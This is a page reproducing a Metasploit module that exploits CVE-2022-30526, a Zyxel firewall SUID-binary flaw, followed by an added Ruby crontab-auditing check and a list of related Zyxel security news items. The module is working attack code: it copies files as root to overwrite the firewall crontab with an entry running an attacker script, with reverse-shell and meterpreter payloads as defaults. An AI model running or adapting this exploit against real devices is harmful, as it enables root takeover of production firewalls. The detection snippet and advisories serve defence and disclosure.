Zyxel Firewall SUID Binary Privilege Escalation

This Metasploit module exploits CVE-2022-30526, a local privilege escalation vulnerability that allows a low-privileged user (e.g. nobody) to escalate to root. The issue stems from a SUID binary that allows all users to copy files as root. The module overwrites the firewall's crontab to execute an attacker-provided script, resulting in code execution as root. To use this module, the attacker must first establish shell access, for example by exploiting CVE-2022-30525. Known affected Zyxel models include USG FLEX (50, 50W, 100W, 200, 500, 700), ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::File
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zyxel Firewall SUID Binary Privilege Escalation',
        'Description' => %q{
          This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
          allows a low privileged user (e.g. nobody) escalate to root. The issue stems from
          a suid binary that allows all users to copy files as root. This module overwrites
          the firewall's crontab to execute an attacker provided script, resulting in code
          execution as root.

          In order to use this module, the attacker must first establish shell access. For
          example, by exploiting CVE-2022-30525.

          Known affected Zyxel models are: USG FLEX (50, 50W, 100W, 200, 500, 700),
          ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.
        },
        'References' => [
          ['CVE', '2022-30526'],
          ['URL', 'https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml']
        ],
        'Author' => [
          'jbaines-r7' # discovery and metasploit module
        ],
        'DisclosureDate' => '2022-06-14',
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD, ARCH_MIPS64],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_MIPS64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'wget' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'MeterpreterTryToFork' => true,
          'WfsDelay' => 70
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # The check first establishes the system is a Zyxel firewall by parsing the
  # /zyinit/fwversion file. Then it attempts to prove that zysudo.suid can be
  # used by the user to write to an otherwise unwritable location.
  def check
    fwversion_data = read_file('/zyinit/fwversion')
    if fwversion_data.nil? || fwversion_data.empty?
      return CheckCode::Safe('Could not read /zyinit/fwversion. The target is not a Zyxel firewall.')
    end

    model_id = fwversion_data[/MODEL_ID=(?<model_id>[^\n]+)/, :model_id]
    return CheckCode::Unknown('Failed to identify the firewall model.') if model_id.nil? || model_id.empty?

    firmware_ver = fwversion_data[/FIRMWARE_VER=(?<firmware_ver>[^\n]+)/, :firmware_ver]
    return CheckCode::Unknown('Failed to identify the firmware version.') if firmware_ver.nil? || firmware_ver.empty?

    test_file = "/var/zyxel/#{rand_text_alphanumeric(12..16)}"
    unless cmd_exec("/bin/cp /etc/passwd #{test_file}") == "/bin/cp: cannot create regular file '#{test_file}': Permission denied"
      return CheckCode::Unknown("Failed to generate a permission issue. System version: #{model_id}, #{firmware_ver}")
    end

    suid_copy_result = cmd_exec("zysudo.suid /bin/cp /etc/passwd #{test_file}")
    unless suid_copy_result.empty?
      return CheckCode::Safe("zysudo.suid copy failed. System version: #{model_id}, #{firmware_ver}")
    end

    # clean up the created file
    cmd_exec("zysudo.suid /bin/rm #{test_file}")
    return CheckCode::Vulnerable("System version: #{model_id}, #{firmware_ver}")
  end

  # no matter what happens, try to reset the crontab to the original state and
  # delete the backup file.
  def cleanup
    unless @crontab_backup.nil?
      print_status('Resetting crontab to the original version')
      cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")
      rm_rf(@crontab_backup)
    end
  end

  def execute_command(cmd, _opts = {})
    # this file will contain the payload and get executed by cron
    exec_filename = "/tmp/#{rand_text_alphanumeric(6..12)}"
    register_file_for_cleanup(exec_filename)
    cmd_exec("echo -e \"#!/bin/bash\\n\\n#{cmd}\" > #{exec_filename}")
    cmd_exec("chmod +x #{exec_filename}")

    # this file will be a copy of the original crontab, plus our additional malicious entry
    evil_crontab = "/tmp/#{rand_text_alphanumeric(6..12)}"
    register_file_for_cleanup(evil_crontab)
    copy_file('/var/zyxel/crontab', evil_crontab)
    cmd_exec("echo '* * * * * root #{exec_filename} &' >> #{evil_crontab}")

    # this is the backup copy of the original crontab. It'll be restored on new session
    @crontab_backup = "/tmp/#{rand_text_alphanumeric(6..12)}"
    copy_file('/var/zyxel/crontab', @crontab_backup)

    # overwrite the legitimate crontab. this is how we get execution.
    print_status('Overwriting /var/zyxel/crontab')
    cmd_exec("zysudo.suid /bin/cp #{evil_crontab} /var/zyxel/crontab")

    # check if the session has been created. Give it 70 seconds to come in.
    # The extra 10 seconds is to account for high latency links.
    print_status('The payload may take up to 60 seconds to be executed by cron')
    sleep_count = 70
    until session_created? || sleep_count == 0
      sleep(1)
      sleep_count -= 1
    end
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end
```
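A defender-side check for the artifact this module leaves behind, added here as an example (it is not part of the Metasploit module or of any Zyxel tooling): it parses system-crontab text such as the contents of /var/zyxel/crontab and reports root jobs that run files from world-writable directories, plus any job missing from a known-good baseline. The function names, the directory list and the sample crontab contents are constructed for illustration.

```ruby
# Added example: audit a system crontab (e.g. the contents of /var/zyxel/crontab).
WORLD_WRITABLE = %w[/tmp/ /var/tmp/ /dev/shm/].freeze # assumed directory list

# System-crontab line: schedule (five fields or @keyword), user, command.
CRON_LINE = /\A\s*(?<sched>@\w+|\S+(?:\s+\S+){4})\s+(?<user>\S+)\s+(?<cmd>.+)\z/

# Returns one hash per job line; comments, blanks and VAR=value lines are skipped.
def parse_crontab(text)
  text.each_line.with_index(1).filter_map do |line, lineno|
    line = line.strip
    next if line.empty? || line.start_with?('#')

    m = CRON_LINE.match(line)
    next unless m

    { lineno: lineno, schedule: m[:sched].split.join(' '),
      user: m[:user], command: m[:cmd].strip }
  end
end

# Root jobs whose command line references a file in a world-writable directory.
def suspicious_entries(text)
  parse_crontab(text).select do |e|
    e[:user] == 'root' &&
      e[:command].split.any? { |tok| WORLD_WRITABLE.any? { |dir| tok.start_with?(dir) } }
  end
end

# Jobs present in the current crontab but not in a known-good baseline copy.
def added_entries(baseline, current)
  known = parse_crontab(baseline).map { |e| e.values_at(:schedule, :user, :command) }
  parse_crontab(current).reject { |e| known.include?(e.values_at(:schedule, :user, :command)) }
end

# Constructed sample data, not taken from a real device.
SAMPLE_BASELINE = <<~CRON
  # constructed baseline
  0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
  */5 * * * * root /usr/local/bin/healthcheck.sh
CRON
SAMPLE_CURRENT = SAMPLE_BASELINE + "* * * * * root /tmp/aB3dE9xQ &\n"

if __FILE__ == $PROGRAM_NAME
  suspicious_entries(SAMPLE_CURRENT).each do |e|
    puts "line #{e[:lineno]}: root runs #{e[:command]} (#{e[:schedule]})"
  end
end
```

Because the module's cleanup routine copies the original crontab back once a session opens, the extra entry may exist only briefly; run the check on a short interval or pair it with file-integrity monitoring of the crontab.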

Related news

New Findings Challenge Attribution in Denmark's Energy Sector Cyberattacks

The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a

Zyxel patches two critical vulnerabilities

Zyxel has released a security advisory about two critical vulnerabilities that could allow an unauthorized, remote attacker to take control of its firewall devices. (Source: Malwarebytes Labs)

New DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

By Deeba Ahmed. Most devices infected by Chaos malware are located in Europe, particularly Italy, but infections were also observed in Asia Pacific, South America, and North America. (Source: HackRead.com)

Chaos Malware Resurfaces With All-New DDoS & Cryptomining Modules

The previously identified ransomware builder has veered in an entirely new direction, targeting consumers and businesses of all sizes by exploiting known CVEs through brute-forced and/or stolen SSH keys.

Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems

A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet. "Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through

Critical RCE Vulnerability Affects Zyxel NAS Devices — Firmware Patch Released

Networking equipment maker Zyxel has released patches for a critical security flaw impacting its network-attached storage (NAS) devices. Tracked as CVE-2022-34747 (CVSS score: 9.8), the issue relates to a "format string vulnerability" affecting NAS326, NAS540, and NAS542 models. Zyxel credited researcher Shaposhnikov Ilya for reporting the flaw. "A format string vulnerability was found in a

Zyxel firewall vulnerabilities left business networks open to abuse

Severity of code execution bug mitigated by ‘high uptake’ of previous patch

CVE-2022-30526: Zyxel security advisory for local privilege escalation and authenticated directory traversal vulnerabilities of firewalls

A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device.

Zyxel USG FLEX 5.21 Command Injection

Zyxel USG FLEX version 5.21 suffers from a command injection vulnerability.

Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller and Firewall Devices

Zyxel has released patches to address four security flaws affecting its firewall, AP Controller, and AP products that could be exploited to execute arbitrary operating system commands and steal select information. The list of security vulnerabilities is as follows - CVE-2022-0734 - A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's

Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw

Critical Zyxel Firewall Bug Under Active Attack After PoC Exploit Debut

Just one day after disclosure, cyberattackers are actively going after the command-injection/code-execution vulnerability in Zyxel's gear.

Zyxel Firewall ZTP Unauthenticated Command Injection

This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.

Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability

Zyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution. "A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device," the company said in an advisory

CVE-2022-30525: Zyxel security advisory for OS command injection vulnerability of firewalls

An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
